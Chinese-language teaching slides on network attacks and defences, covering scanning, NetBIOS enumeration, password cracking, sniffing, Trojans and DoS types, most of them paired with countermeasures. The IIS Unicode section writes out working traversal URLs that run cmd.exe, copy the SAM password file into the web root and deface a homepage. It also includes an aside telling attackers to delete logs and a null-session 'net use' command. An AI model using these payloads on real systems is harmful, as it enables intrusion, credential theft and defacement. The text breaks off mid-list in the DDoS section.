常見的網(wǎng)絡攻擊與防范課件

第五章常見的網(wǎng)絡攻擊與防范網(wǎng)絡攻擊步驟預攻擊探測漏洞掃描（綜合掃描）木馬攻擊拒絕服務攻擊欺騙攻擊蠕蟲病毒攻擊其他攻擊1一、網(wǎng)絡攻擊步驟網(wǎng)絡安全威脅國家基礎設施因特網(wǎng)安全漏洞危害在增大信息對抗的威脅在增加電力交通通訊控制廣播工業(yè)金融醫(yī)療2一、網(wǎng)絡攻擊步驟網(wǎng)絡中存在的安全威脅網(wǎng)絡內部、外部泄密拒絕服務攻擊邏輯炸彈特洛伊木馬黑客攻擊計算機病毒信息丟失、篡改、銷毀后門、隱蔽通道蠕蟲3一、網(wǎng)絡攻擊步驟典型攻擊步驟預攻擊探測收集信息,如OS類型,提供的服務端口發(fā)現(xiàn)漏洞,采取攻擊行為獲得攻擊目標的控制權系統(tǒng)繼續(xù)滲透網(wǎng)絡,直至獲取機密數(shù)據(jù)消滅蹤跡破解口令文件,或利用緩存溢出漏洞以此主機為跳板，尋找其它主機的漏洞獲得系統(tǒng)帳號權限，并提升為root權限安裝系統(tǒng)后門方便以后使用4一、網(wǎng)絡攻擊步驟典型攻擊步驟圖解5一、網(wǎng)絡攻擊步驟攻擊手法vs.入侵者技術高低19801985199019952000密碼猜測可自動復制的代碼破解密碼利用已知的漏洞破壞審計系統(tǒng)后門會話劫持消除痕跡嗅探IP欺騙GUI遠程控制自動探測掃描拒絕服務www攻擊攻擊手法與工具入侵者技術半開隱蔽掃描控制臺入侵檢測網(wǎng)絡管理DDOS攻擊6二、預攻擊探測預攻擊概述端口掃描基礎操作系統(tǒng)識別資源掃描與查找用戶和用戶組查找7二、預攻擊探測1.預攻擊概述Pingsweep

尋找存活主機Portscan

尋找存活主機的開放服務（端口）OSfingerprint 操作系統(tǒng)識別資源和用戶信息掃描網(wǎng)絡資源，共享資源，用戶名和用戶組等8二、預攻擊探測Ping工具操作系統(tǒng)本身的ping工具

Ping:PacketInterNetGroper

用來判斷遠程設備可訪問性最常用的方法

Ping原理:發(fā)送ICMPEcho消息，等待EchoReply消息可以確定網(wǎng)絡和外部主機的狀態(tài)可以用來調試網(wǎng)絡的軟件和硬件每秒發(fā)送一個包，顯示響應的輸出，計算網(wǎng)絡來回的時間最后顯示統(tǒng)計結果——丟包率9二、預攻擊探測關于PingPing有許多命令行參數(shù)，可以改變缺省的行為可以用來發(fā)現(xiàn)一臺主機是否active為什么不能ping成功？沒有路由，網(wǎng)關設置？網(wǎng)卡沒有配置正確增大timeout值被防火墻阻止……“Pingofdeath”發(fā)送特大ping數(shù)據(jù)包(>65535字節(jié))導致機器崩潰許多老的操作系統(tǒng)都受影響10二、預攻擊探測Windows平臺Pinger、PingSweep、WS_PingProPack圖:Pinger工具11二、預攻擊探測圖:PingSweep12二、預攻擊探測Ping工具都是通過ICMP協(xié)議來發(fā)送數(shù)據(jù)包,那么針對這種掃描的預防措施是:使用可以檢測并記錄ICMP掃描的工具使用入侵檢測系統(tǒng)在防火墻或路由器中設置允許進出自己網(wǎng)絡的ICMP分組類型13二、預攻擊探測2.端口掃描基礎開放掃描(OpenScanning)需要掃描方通過三次握手過程與目標主機建立完整的TCP連接可靠性高，產生大量審計數(shù)據(jù)，容易被發(fā)現(xiàn)半開放掃描(Half-OpenScanning)掃描方不需要打開一個完全的TCP連接秘密掃描(StealthScanning)不包含標準的TCP三次握手協(xié)議的任何部分隱蔽性好，但這種掃描使用的數(shù)據(jù)包在通過網(wǎng)絡時容易被丟棄從而產生錯誤的探測信息

14二、預攻擊探測基本的TCPconnect()掃描（開放）Reverse-ident掃描（開放）TCPSYN掃描(半開放)IPIDheaderaka“dump”掃描(半開放)TCPFin掃描(秘密)TCPXMAS掃描(秘密)TCPftpproxy掃描(bounceattack)用IP分片進行SYN/FIN掃描(躲開包過濾防火墻)UDPICMP端口不可達掃描UDPrecvfrom掃描15二、預攻擊探測16二、預攻擊探測開放掃描TCPconnect()掃描原理掃描器調用socket的connect()函數(shù)發(fā)起一個正常的連接如果端口是打開的，則連接成功否則，連接失敗優(yōu)點簡單，不需要特殊的權限缺點服務器可以記錄下客戶的連接行為，如果同一個客戶輪流對每一個端口發(fā)起連接，則一定是在掃描17二、預攻擊探測Reverse-ident掃描Ident協(xié)議(RFC1413)使得可以發(fā)現(xiàn)任何一個通過TCP連接的進程的所有者的用戶名，即使該進程并沒有發(fā)起該連接只有在TCP全連接之后才有效TCP端口113例如可以先連接到80端口，然后通過identd來發(fā)現(xiàn)服務器是否在root下運行建議關閉ident服務，或者在防火墻上禁止，除非是為了審計的目的18二、預攻擊探測半開放掃描

TCPSYN掃描原理向目標主機的特定端口發(fā)送一個SYN包如果應答包為RST包，則說明該端口是關閉的否則，會收到一個SYN|ACK包。于是，發(fā)送一個RST，停止建立連接由于連接沒有完全建立，所以稱為“半開連接掃描”優(yōu)點很少有系統(tǒng)會記錄這樣的行為缺點在UNIX平臺上，需要root權限才可以建立這樣的SYN數(shù)據(jù)包19二、預攻擊探測IPIDheaderaka“dump”掃描由Antirez首先使用，并在Bugtraq上公布原理：掃描主機通過偽造第三方主機IP地址向目標主機發(fā)起SYN掃描，并通過觀察其IP序列號的增長規(guī)律獲取端口的狀態(tài)優(yōu)點不直接掃描目標主機也不直接和它進行連接，隱蔽性較好缺點對第三方主機的要求較高

20二、預攻擊探測秘密掃描TCPFin掃描原理掃描器發(fā)送一個FIN數(shù)據(jù)包如果端口關閉的，則遠程主機丟棄該包，并送回一個RST包否則的話，遠程主機丟棄該包，不回送變種，組合其他的標記優(yōu)點不是TCP建立連接的過程，所以比較隱蔽缺點與SYN掃描類似，也需要構造專門的數(shù)據(jù)包在Windows平臺無效，總是發(fā)送RST包21二、預攻擊探測TCPXMAS掃描原理掃描器發(fā)送的TCP包包頭設置所有標志位關閉的端口會響應一個同樣設置所有標志位的包開放的端口則會忽略該包而不作任何響應優(yōu)點比較隱蔽缺點主要用于UNIX/Linux/BSD的TCP/IP的協(xié)議棧不適用于Windows系統(tǒng)22二、預攻擊探測其他掃描TCPftpproxy掃描原理用PORT命令讓ftpserver與目標主機建立連接，而且目標主機的端口可以指定如果端口打開，則可以傳輸否則，返回"425Can'tbuilddataconnection:Connectionrefused."Ftp這個缺陷還可以被用來向目標(郵件,新聞)傳送匿名信息優(yōu)點：這種技術可以用來穿透防火墻缺點：慢，有些ftpserver禁止這種特性23二、預攻擊探測UDPICMP端口不可達掃描利用UDP協(xié)議（主機掃描？）原理開放的UDP端口并不需要送回ACK包，而關閉的端口也不要求送回錯誤包，所以利用UDP包進行掃描非常困難有些協(xié)議棧實現(xiàn)的時候，對于關閉的UDP端口，會送回一個ICMPPortUnreach錯誤缺點速度慢，而且UDP包和ICMP包都不是可靠的需要root權限，才能讀取ICMPPortUnreach消息一個應用例子Solaris的rpcbind端口(UDP)位于32770之上，這時可以通過這種技術來探測24二、預攻擊探測端口掃描對策設置防火墻過濾規(guī)則，阻止對端口的掃描例如可以設置檢測SYN掃描而忽略FIN掃描使用入侵檢測系統(tǒng)禁止所有不必要的服務，把自己的暴露程度降到最低Unix或linux中，在/etc/inetd.conf中注釋掉不必要的服務，并在系統(tǒng)啟動腳本中禁止其他不必要的服務Windows中通過Services禁止敏感服務，如IIS25二、預攻擊探測端口掃描工具圖:NetScanTools26二、預攻擊探測圖:WinScan27二、預攻擊探測圖:SuperScan28二、預攻擊探測圖:Nmap29二、預攻擊探測圖:X-scan30二、預攻擊探測3.操作系統(tǒng)的識別操作系統(tǒng)辨識的動機許多漏洞是系統(tǒng)相關的，而且往往與相應的版本對應從操作系統(tǒng)或者應用系統(tǒng)的具體實現(xiàn)中發(fā)掘出來的攻擊手段都需要辨識系統(tǒng)操作系統(tǒng)的信息還可以與其他信息結合起來，比如漏洞庫，或者社會詐騙(社會工程，socialengineering)如何辨識一個操作系統(tǒng)一些端口服務的提示信息，例如，telnet、http、ftp等服務的提示信息TCP/IP棧指紋DNS泄漏出OS系統(tǒng)31二、預攻擊探測圖:winfingerprint32二、預攻擊探測4.資源掃描與查找

資源掃描用戶掃描網(wǎng)絡資源和共享資源，如目標網(wǎng)絡計算機名、域名和共享文件等等；而用戶掃描則用戶掃描目標系統(tǒng)上合法用戶的用戶名和用戶組名。這些掃描都是攻擊目標系統(tǒng)的很有價值的信息，而Windows系統(tǒng)，特別是WindowsNT/2000在這些方面存在著嚴重的漏洞，很容易讓非法入侵者獲取到關于該目標系統(tǒng)的很多有用信息，如共享資源、Netbios名和用戶組等。采用協(xié)議：NetBIOS協(xié)議、CIFS/SMB協(xié)議和空會話常用工具：NetViewNbtstat和NbtscanLegion和Shed33二、預攻擊探測NetView

在命令行中輸入“netview/domain”命令，可以獲取網(wǎng)絡上可用的域34二、預攻擊探測在命令行中輸入“netview/domain：domain_name”命令，可以獲取某一域中的計算機列表，其中domain_name為要列表計算機的域名。

在命令行中輸入“netview\\computer_name”命令，可以獲取網(wǎng)絡某一計算機的共享資源列表，其中computer_name為計算機名。35二、預攻擊探測nbtstat和nbtscan

nbtstat（NetBIOSoverTCP/IP）是WindowsNT/2000內置的命令行工具，利用它可以查詢涉及到NetBIOS信息的網(wǎng)絡機器。另外，它還可以用來消除NetBIOS高速緩存器和預加載LMHOSTS文件等。這個命令在進行安全檢查時非常有用。利用nbtstat查看目標系統(tǒng)NetBIOS列表36二、預攻擊探測Nbtstat本身有一些缺陷，如一次只能掃描一臺主機等，nbtscan（http://www.abb.aha.ru/software/nbtscan.html）卻可以對一個網(wǎng)段進行掃描,利用nbtscan對網(wǎng)段進行掃描。

37二、預攻擊探測Legion和Shed

在NetBIOS掃描中，很重要的一項就是掃描網(wǎng)絡中的共享資源，以竊取資源信息或植入病毒木馬。Legion和Shed就是其中的典型。Legion的共享資源掃描可以對一個IP或網(wǎng)段進行掃描，它還包含一個共享密碼的蠻力攻擊工具，如“ShowBFTool”按鈕。主要用于Windows2000以前的操作系統(tǒng)中38二、預攻擊探測Shed是一個速度很快的共享資源掃描工具，它可以顯示所有的共享資源，包含隱藏的共享。39二、預攻擊探測空會話原理利用WindowsNT/2000對NetBIOS的缺省信賴通過TCP端口139返回主機的大量信息實例如果通過端口掃描獲知TCP端口139已經(jīng)打開netuse\\30\IPC$""/USER:""在攻擊者和目標主機間建立連接

Windows2000還有另一個SMB端口445預防資源掃描和查找的方法：

防范NetBIOS掃描的最直接方法就是不允許對TCP/UDP135到139端口的訪問，如通過防火墻或路由器的配置等。另外，對單獨的主機，可使用NetBIOSoverTCP/IP項失效或注冊表配置來實現(xiàn)。Windows2000操作系統(tǒng)還要禁止445端口。40二、預攻擊探測5.用戶和用戶組查找利用前面介紹的方法，可以很容易獲取遠程WindowsNT/2000主機的共享資源、NetBIOS名和所處的域信息等。但黑客和非法入侵者更感興趣的是通過NetBIOS掃描，獲取目標主機的用戶名列表。如果知道了系統(tǒng)中的用戶名（即賬號）后，就可以對該賬號對應的口令進行猜測攻擊（有些口令往往很簡單），從而對遠程目標主機進行更深入的控制。在WindowsNT/2000的資源工具箱NTRK中提供了眾多的工具用于顯示遠程主機用戶名和組信息，如前面介紹的nbtstat和nbtscan,另外還有UsrStat等工具41二、預攻擊探測UsrStat

UsrStat是一個命令行工具，用于顯示一個給定域中的每一個用戶的用戶名、全名和最后的登錄日期與時間，如圖所示，可顯示域中計算機上的用戶信息。42三、漏洞掃描口令破解網(wǎng)絡嗅探漏洞攻擊綜合掃描43三、漏洞掃描漏洞掃描是一種最常見的攻擊模式，用于探測系統(tǒng)和網(wǎng)絡漏洞，如獲取系統(tǒng)和應用口令，嗅探敏感信息，利用緩存區(qū)溢出直接攻擊等。針對某一類型的漏洞，都有專門的攻擊攻擊。另外，也有一些功能強大綜合掃描工具，針對系統(tǒng)進行全面探測和漏洞掃描，如流光等。44三、漏洞掃描1.口令破解系統(tǒng)漏洞

利用系統(tǒng)漏洞直接提取口令暴力窮舉完全取決于機器的運算速度字典破解大大減少運算的次數(shù)，提高成功率45三、漏洞掃描圖：NT/2000密碼---LC3工具46三、漏洞掃描針對口令破解攻擊的防范措施安裝入侵檢測系統(tǒng)，檢測口令破解行為安裝安全評估系統(tǒng)，先于入侵者進行模擬口令破解，以便及早發(fā)現(xiàn)弱口令并解決提高安全意識，避免弱口令47三、漏洞掃描2.網(wǎng)絡嗅探

網(wǎng)絡嗅探是主機的一種工作模式，在這種模式下，主機可以接收到共享式網(wǎng)段在同一條物理通道上傳輸?shù)乃行畔?，而不管這些信息的發(fā)送方和接受方是誰。此時，如果兩臺主機進行通信的信息沒有加密，只要使用某些網(wǎng)絡監(jiān)聽工具，例如,SnifferPro,NetXray，tcpdump，Dsniff等就可以輕而易舉地截取包括口令、帳號等敏感信息。共享信道

廣播型以太網(wǎng)協(xié)議不加密

口令明文傳輸混雜模式

處于這種模式的網(wǎng)卡接受網(wǎng)絡中所有數(shù)據(jù)包48三、漏洞掃描針對口令破解攻擊的防范措施安裝VPN網(wǎng)關，防止對網(wǎng)間網(wǎng)信道進行嗅探對內部網(wǎng)絡通信采取加密處理采用交換設備進行網(wǎng)絡分段采取技術手段發(fā)現(xiàn)處于混雜模式的主機，發(fā)掘“鼴鼠”49三、漏洞掃描3.漏洞攻擊

漏洞即某個程序(包括操作系統(tǒng))在設計時未考慮周全，當程序遇到一個看似合理，但實際無法處理的問題時，引發(fā)的不可預見的錯誤。

漏洞的產生大致有三個原因：編程人員的人為因素，在程序編寫過程，為實現(xiàn)不可告人的目的，在程序代碼的隱蔽處保留后門。受編程人員的能力、經(jīng)驗和當時安全技術所限，在程序中難免會有不足之處，輕則影響程序效率，重則導致非授權用戶的權限提升。由于硬件原因，使編程人員無法彌補硬件的漏洞，從而使硬件的問題通過軟件表現(xiàn)50三、漏洞掃描VulnerabilityWindowsVulnerabilityScanner是一個系統(tǒng)漏洞維護工具

弱點、漏洞。任何系統(tǒng)都存在漏洞。exploit針對漏洞開發(fā)的應用程序。exploit就是利用一切可以利用的工具、采用一切可以采用的方法、找到一切可以找到的漏洞，并且通過對漏洞資料的分析研究，從而達到獲取網(wǎng)站用戶資料文檔、添加自定義用戶、甚至侵入網(wǎng)站獲得管理員權限控制整個網(wǎng)站的最終目的。51三、漏洞掃描常見漏洞攻擊實例Unicode漏洞

Unicode漏洞編碼在中文WindowsNT中為：

%c1%1c（代表(0xc1-0xc0)*0x40+0x1c=0x5c=＇/＇）和

%c0%2f（代表(0xc0-0xcx)*0x40+0x2f=0x2f=＇\＇）在英文版中為%c0%af（但%c1%pc、%c0%9v、

%c0%qf、%c1%8s等幾個編碼也可能有效）。

通過這幾個編碼我們可以通過在瀏覽器上獲得有Unicode漏洞的機器的文件控制權。

簡單的檢測辦法是在瀏覽器里面輸入：http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../

winnt/system32/cmd.exe?/c+dir，如果顯示：

DirectoryofD:\Inetpub\scripts

01-05-0202:32a.

01-05-0202:32a..

00-12-1805:50p

samples

……

說明網(wǎng)站存在漏洞，如果不顯示該頁面，也可能是因為Scripts目錄改名了，我們可以試著輸入：

http://xxx.xxx.xxx.xxx/msabc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/

cmd.exe?/c+dir，如果顯示像上面一樣的目錄，表明存在漏洞。（例子中xxx.xxx.xxx.xxx為服務器的IP地址，在DOS窗口用ping命令即可獲得）

如果還是沒有顯示該頁面，可用上述其他代碼：如%%c0%af代替%c1%1c試試。52三、漏洞掃描Unicode漏洞攻擊

通過Unicode漏洞就可以使攻擊者在瀏覽器執(zhí)行DOS命令，如：

http://xxx.xxx.xxx.xxx/scripts/..á../winnt/system32/cmd.exe?/c+dir+c

這條命令將使服務器列出C盤所有目錄文件。

http://xxx.xxx.xxx.xxx/scripts/..á../winnt/system32/cmd.exe?+copy+c:

\winnt\rapair|sam._+c:\inetpub\wwwroot\

這將使服務器執(zhí)行一個復制C盤WinNT目錄下sam._到wwwroot文件夾的命令(sam.保存了經(jīng)過加密的WindowsNT系統(tǒng)密碼文件，如果攻擊者下載這一文件，可以在本機用工具解得用戶密碼)。

利用Echo命令即可通過瀏覽器直接更改網(wǎng)站的主頁，如想修改

c:\inetpub\wwwroot\index.asp，攻擊者可以通過在瀏覽器的地址欄輸入：

http://xxx.xxx.xxx.xxx/scripts/..á../winnt/system32/cmd.exe?/

c+echo+Your+Site+Has+Been+Hacked+>c:\inetpub\wwwroot\index.asp

攻擊者還可以利用FTP、TFTP上載木馬程序及提升管理權限的程序到被攻擊的服務器上,,也可以通過建立一個BAT或ASP文件直接獲得系統(tǒng)權限從而控制整個系統(tǒng)。

53三、漏洞掃描如何防范Unicode編碼攻擊

Unicode編碼漏洞最好的修補方式是下載安裝微軟提供的補丁IIS4.0補丁和IIS5.0補丁可以通過查看winnt\system32\logfiles下的W3SVC1目錄的log文件，確定是否有人利用Unicode漏洞攻擊你的主機（根據(jù)設置不同也可能是在W3SVC2或者W3SVC3目錄下，黑客們攻擊網(wǎng)站后記住刪除這個目錄下的文件?。。。︰nicode漏洞給網(wǎng)絡安全管理員配置系統(tǒng)的幾個啟示：在安裝WindowsNT系統(tǒng)的時候，不要按照系統(tǒng)的默認目錄把Wwindows安裝在WinNT目錄下，把WinNT目錄改名將使攻擊者難于猜中命令執(zhí)行目錄；應該把/WinNT/System32目錄下的cmd.exe和net.exe改名或者刪除，這樣攻擊者就無法找到執(zhí)行命令的文件；應該把WEB服務器所有的默認安裝的執(zhí)行目錄刪除，包括Samples、Scripts及Cgi－bin，這些目錄如果被上傳可執(zhí)行文件，即可能對系統(tǒng)造成重大威脅，如果需要可執(zhí)行目錄，則自己建一個不與默認執(zhí)行目錄同名的目錄；網(wǎng)絡管理員應該把系統(tǒng)日記文件目錄移到一個更隱蔽的地方，這樣攻擊者就不容易找到系統(tǒng)記錄文件加以清除了。54三、漏洞掃描針對漏洞掃描的預防措施安裝防火墻，禁止訪問不該訪問的服務端口，使用NAT隱藏內部網(wǎng)絡結構安裝入侵檢測系統(tǒng)，檢測漏洞掃描行為安裝安全評估系統(tǒng)，先于入侵者進行漏洞掃描，以便及早發(fā)現(xiàn)問題并解決提高安全意識，經(jīng)常給操作系統(tǒng)和應用軟件打補丁**windows2000/XP漏洞攻擊參見“windows漏洞”55三、漏洞掃描4.綜合掃描安全掃描審計分類網(wǎng)絡安全掃描系統(tǒng)安全掃描優(yōu)點較全面檢測流行漏洞降低安全審計人員的勞動強度防止最嚴重的安全問題缺點無法跟上安全技術的發(fā)展速度只能提供報告，無法實際解決可能出現(xiàn)漏報和誤報56三、漏洞掃描市場部工程部router開發(fā)部InternetServersFirewall圖：綜合掃描應用57三、漏洞掃描對系統(tǒng)進行安全評估

為堵死安全策略和安全措施之間的缺口,必須從以下三方面對網(wǎng)絡安全狀況進行評估:從企業(yè)外部進行評估:考察企業(yè)計算機基礎設施中的防火墻;從企業(yè)內部進行評估:考察內部網(wǎng)絡系統(tǒng)中的計算機；從應用系統(tǒng)進行評估:考察每臺硬件設備上運行的操作系統(tǒng)。

綜合掃描工具流光X-ScannerCIS掃描器58四、木馬攻擊木馬概述木馬的組成木馬分類木馬常用的欺騙方法針對木馬攻擊的防范措施59四、木馬與后門攻擊1.木馬概述

特洛伊木馬程序可以直接侵入用戶的電腦并進行破壞，它常被偽裝成工具程序或者游戲等誘使用戶打開帶有木馬程序的郵件附件或從網(wǎng)上直接下載，一旦用戶打開了這些郵件的附件或者執(zhí)行了這些程序之后，它們就會在計算機系統(tǒng)中隱藏一個可以在啟動時悄悄執(zhí)行的程序。這種遠程控制工具可以完全控制受害主機，危害極大。Windows下：Netbus、subseven、BO2000、冰河、網(wǎng)絡神偷UNIX下：Rhost++、Login后門、rootkit等60四、木馬與后門攻擊2.木馬的組成

對木馬程序而言，它一般包括兩個部分：客戶端和服務器端。服務器端安裝在被控制的計算機中，它一般通過電子郵件或其他手段讓用戶在其計算機中運行，以達到控制該用戶計算機的目的?？蛻舳顺绦蚴强刂普咚褂玫?，用于對受控的計算機進行控制。服務器端程序和客戶端程序建立起連接就可以實現(xiàn)對遠程計算機的控制了。木馬運行時，首先服務器端程序獲得本地計算機的最高操作權限，當本地計算機連入網(wǎng)絡后，客戶端程序可以與服務器端程序直接建立起連接，并可以向服務器端程序發(fā)送各種基本的操作請求，并由服務器端程序完成這些請求，也就實現(xiàn)對本地計算機的控制了。

備注：木馬發(fā)揮作用必須要求服務器端程序和客戶端程序同時存在，所以必須要求本地機器感染服務器端程序。服務器端程序是可執(zhí)行程序，可以直接傳播，也可以隱含在其他的可執(zhí)行程序中傳播，但木馬本身不具備繁殖性和自動感染的功能。61四、木馬與后門攻擊3.木馬分類遠程訪問型木馬：是現(xiàn)在最廣泛的特洛伊木馬，它可以訪問受害人的硬盤，并對其進行控制。這種木馬用起來非常簡單，只要某用戶運行一下服務端程序，并獲取該用戶的IP地址，就可以訪問該用戶的計算機。這種木馬可以使遠程控制者在本地機器上做任意的事情，比如鍵盤記錄、上傳和下載功能、截取屏幕等等。這種類型的木馬有著名的BO（BackOffice）和國產的冰河等。密碼發(fā)送型木馬：其目的是找到所有的隱藏密碼，并且在受害者不知道的情況下把它們發(fā)送到指定的信箱。大多數(shù)這類的木馬不會在每次的Windows重啟時重啟，而且它們大多數(shù)使用25端口發(fā)送E--mail。62四、木馬與后門攻擊鍵盤記錄型木馬：其非常簡單的，它們只做一種事情，就是記錄受害者的鍵盤敲擊，并且在LOG文件里做完整的記錄。這種特洛伊木馬隨著Windows的啟動而啟動，知道受害者在線并且記錄每一件事。

毀壞型木馬：其唯一功能是毀壞并且刪除文件。這使它們非常簡單，并且很容易被使用。它們可以自動地刪除用戶計算機上的所有的.DLL、INI或EXE文件。FTP型木馬：其打開用戶計算機的21端口（FTP所使用的默認端口），

使每一個人都可以用一個FTP客戶端程序來不用密碼連接到該計算機，并且可以進行最高權限的上傳下載63四、木馬與后門攻擊捆綁欺騙：如把木馬服務端和某個游戲捆綁成一個文件在郵件中發(fā)給別人；危險下載點：攻破一些下載站點后，下載幾個下載量大的軟件，捆綁上木馬，再悄悄放回去讓別人下載；或直接將木馬改名上載到FTP網(wǎng)站上，等待別人下載；文件夾慣性點擊：把木馬文件偽裝成文件夾圖標后，放在一個文件夾中，然后在外面再套三四個空文件夾；zip偽裝：將一個木馬和一個損壞的zip包捆綁在一起，然后指定捆綁后的文件為zip圖標；網(wǎng)頁木馬64四、木馬與后門攻擊4.木馬常用的欺騙方法木馬隱藏方式：在任務欄中隱藏；在任務管理器中隱形；悄沒聲息地啟動：如啟動組、win.ini、system.ini、注冊表等；注意自己的端口；偽裝成驅動程序及動態(tài)鏈接庫：如Kernl32.dll，sysexlpr.exe

等。65四、木馬與后門攻擊一般情況下，木馬在運行后，都會修改系統(tǒng)，以便下一次系統(tǒng)啟動時自動運行該木馬程序。修改系統(tǒng)的方法有下面幾種：利用Autoexec.bat和Config.sys進行加載;修改注冊表;修改win.ini文件;感染W(wǎng)indows系統(tǒng)文件,以便進行自動啟動并達到自動隱藏的目的.66四、木馬與后門攻擊5.冰河演示國內黑客組織編寫；分為服務器端和客戶端：G_Server.exe和G_Client.exe功能齊全：跟蹤屏幕變化；記錄各種口令；獲取系統(tǒng)信息；控制系統(tǒng)；注冊表操作；文件操作；點對點通信缺省使用7626端口67四、木馬與后門攻擊68四、木馬與后門攻擊69四、木馬與后門攻擊5.針對木馬攻擊的預防措施安裝防火墻，禁止訪問不該訪問的服務端口，使用NAT隱藏內部網(wǎng)絡結構安裝防病毒軟件提高安全意識，盡量避免使用來歷不明的軟件防范：端口掃描；查看連接；檢查注冊表；查找文件；殺病毒軟件或木馬清除軟件。70五、拒絕服務攻擊拒絕服務攻擊分布式拒絕服務攻擊71五、拒絕服務攻擊1.拒絕服務攻擊DoS（DenialofService）是一種利用合理的服務請求占用過多的服務資源，從而使合法用戶無法得到服務響應的網(wǎng)絡攻擊行為。被DoS攻擊時的現(xiàn)象大致有：

*被攻擊主機上有大量等待的TCP連接；

*被攻擊主機的系統(tǒng)資源被大量占用，造成系統(tǒng)停頓；

*網(wǎng)絡中充斥著大量的無用的數(shù)據(jù)包，源地址為假地址；

*高流量無用數(shù)據(jù)使得網(wǎng)絡擁塞，受害主機無法正常與外界通訊；

*利用受害主機提供的服務或傳輸協(xié)議上的缺陷，反復高速地發(fā)出特定的服務請求，使受害主機無法及時處理所有正常請求；

*嚴重時會造成系統(tǒng)死機。72五、拒絕服務攻擊常見的拒絕服務攻擊SYNFoold攻擊是利用TCP協(xié)議缺陷，發(fā)送大量偽造的TCP連接請求，使被攻擊方資源耗盡(CPU滿負荷或內存不足)的攻擊方式。SYNFlood攻擊的過程在TCP協(xié)議中被稱為三次握手(Three-wayHandshake)，而SYNFlood拒絕服務攻擊就是通過三次握手而實現(xiàn)的。三次握手簡介：首先，請求端（客戶端）發(fā)送一個包含SYN標志的TCP報文，SYN即同步（Synchronize），同步報文會指明客戶端使用的端口以及TCP連接的初始序號。服務器在收到客戶端的SYN報文后，將返回一個SYN+ACK的報文，表示客戶端的請求被接受，同時TCP序號被加一，ACK即確認（Acknowledgement）。

最后，客戶端也返回一個確認報文ACK給服務器端，同樣TCP序列號被加1，到此一個TCP連接完成。73五、拒絕服務攻擊SYN-Flooding攻擊演示SYN（我可以和你連接嗎？）ACK|SYN（可以，請確認?。〢CK（確認連接）發(fā)起方應答方正常的三次握手建立通訊的過程74五、拒絕服務攻擊攻擊者受害者攻擊者偽造源地址進行SYN請求為何還沒回應就是讓你白等不能建立正常的連接其它正常用戶得不到響應SYN（我可以和你連接嗎？）ACK|SYN（可以，請確認?。?？？？75五、拒絕服務攻擊攻擊者目標攻擊者偽造源地址進行SYN請求好像不管用了其它正常用戶能夠得到響應SYNACK|SYN？？？SYNACKACK|SYNSYN-Flooding攻擊的防范措施76五、拒絕服務攻擊UDP-Flood攻擊原理：

攻擊者利用簡單的TCP/IP服務，如Chargen和Echo來傳送毫無用處的占滿帶寬的數(shù)據(jù)。通過偽造與某一主機的Chargen服務之間的一次的UDP連接，回復地址指向開著Echo服務的一臺主機，這樣就生成在兩臺主機之間存在很多的無用數(shù)據(jù)流，這些無用數(shù)據(jù)流就會導致帶寬的服務攻擊。

**chargen:字符產生的縮寫，輸出一個可打印字符的旋轉序列，用于測試字符終端設備**

77五、拒絕服務攻擊UDPFlooder演示78五、拒絕服務攻擊杜絕UDP攻擊的方法

關掉不必要的TCP/IP服務;配置防火墻以阻斷來自Internet的UDP服務請求不過這可能會阻斷一些正常的UDP服務請求。

79五、拒絕服務攻擊SMURF攻擊原理：

Smurf是一種具有放大效果的DoS攻擊，具有很大的危害性。這種攻擊形式利用了TCP/IP中的定向廣播的特性，共有三個參與角色：受害者、幫兇（放大網(wǎng)絡，即具有廣播特性的網(wǎng)絡）和攻擊者。攻擊者向放大網(wǎng)絡中的廣播地址發(fā)送源地址（假冒）為受害者系統(tǒng)的ICMP回射請求，由于廣播的原因，放大網(wǎng)絡上的所有系統(tǒng)都會向受害者系統(tǒng)做出回應，從而導致受害者不堪重負而崩潰。80五、拒絕服務攻擊81五、拒絕服務攻擊檢測：如果在網(wǎng)絡內檢測到目標地址為廣播地址的ICMP包。證明內部有人發(fā)起了這種攻擊（或者是被用作攻擊，或者是內部人員所為）；如果ICMP包的數(shù)量在短時間內上升許多(正常的ping程序每隔一秒發(fā)一個ICMPecho請求)，證明有人在利用這種方法攻擊系統(tǒng)。預防Smurf攻擊為了防止成為DoS的幫兇，最好關閉外部路由器或防火墻的廣播地址特性；為了防止被攻擊，在防火墻上過濾掉ICMP報文，或者在服務器上禁止Ping，并且只在必要時才打開ping服務。

Smurf還有一個變種為Fraggle攻擊，它利用UDP來代替ICMP包。

82五、拒絕服務攻擊眼淚攻擊原理：利用在TCP/IP堆棧中實現(xiàn)信任IP碎片中的包的標題頭所包含的信息來實現(xiàn)自己的攻擊。IP分段含有指明該分段所包含的是原包的哪一段的信息，某些TCP/IP(包括servicepack4以前的NT)在收到含有重疊偏移的偽造分段時將崩潰。

防御淚滴攻擊的最好辦法升級服務包軟件，如下載操作系統(tǒng)補丁或升級操作系統(tǒng)等;

在設置防火墻時對分組進行重組，而不進行轉發(fā)，這樣也可以防止這種攻擊。83五、拒絕服務攻擊Land攻擊原理：用一個特別打造的SYN包，它的源地址和目標地址都被設置成某一個服務器地址。此舉將導致接收服務器向它自己的地址發(fā)送SYN+ACK消息，結果這個地址又發(fā)回ACK消息并創(chuàng)建一個空連接。被攻擊的服務器每接收一個這樣的連接都將保留，直到超時，對Land攻擊反應不同，許多UNIX實現(xiàn)將崩潰，NT變的極其緩慢(大約持續(xù)5分鐘)。LAND攻擊預防:

預防LAND攻擊最好的辦法是配置防火墻，對哪些在外部接口入站的含有內部源地址的數(shù)據(jù)包過濾。84五、拒絕服務攻擊針對拒絕服務攻擊的防范措施安裝防火墻，禁止訪問不該訪問的服務端口，過濾不正常的畸形數(shù)據(jù)包，使用NAT隱藏內部網(wǎng)絡結構安裝入侵檢測系統(tǒng)，檢測拒絕服務攻擊行為安裝安全評估系統(tǒng)，先于入侵者進行模擬攻擊，以便及早發(fā)現(xiàn)問題并解決提高安全意識，經(jīng)常給操作系統(tǒng)和應用軟件打補丁85五、拒絕服務攻擊2.分布式拒絕服務攻擊DDOSDDOS則是利用多臺計算機，采用了分布式對單個或者多個目標同時發(fā)起DoS攻擊。其特點是:目標是“癱瘓敵人”，而不是傳統(tǒng)的破壞和竊密;利用國際互聯(lián)網(wǎng)遍布全球的計算機發(fā)起攻擊，難于追蹤。DDoS攻擊由三部分組成

客戶端程序（黑客主機）

控制點（Master）

